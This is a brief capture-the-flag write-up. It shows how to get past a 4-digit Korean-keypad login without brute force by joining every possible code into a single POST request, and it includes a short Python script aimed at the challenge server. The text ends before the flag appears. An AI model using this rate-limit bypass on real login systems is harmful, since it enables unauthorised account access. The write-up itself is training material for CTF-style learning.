Synopsis

We are going to crack a digital code... BUT whitout brute force ?!

The environnement

We need to log in, to do so, we have access to a Korean digipad with 10 different characters...

The code is only 4 digit, so without brute force limit, we could have done it easily, but for this time, there must be another way...

No need to BF

Here is the normal request with burp

And here is another request with burp with a lot more characters (these are the 10 Korean characters url encoded and repeated)

We can see that there is no error message, maybe all the sequences of 4 korean characters are tested. Assuming that, we just need to craft a big request with all the possibilities.

Creating all the possibilities

I use my own tool to do so but I guess crunch would have done the job too

Here is the list:

Get the flag

#!/usr/bin/env python3

import requests
import urllib3


urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings()

URL="http://challs.dvc.tf:2020"
TITLE="*** get code @Fey ***\n"

def get_codes():
    f = open("codes.txt").read().split("\n")
    return f

def send_codes(codes):
    payload = {"code":codes}
    rep = requests.post(url=URL,data=payload)
    return rep

if __name__ == "__main__":
    c_list = get_codes()
    CODES = "".join(c_list)
    resp = send_codes(CODES)
    print (resp.text)

And finally...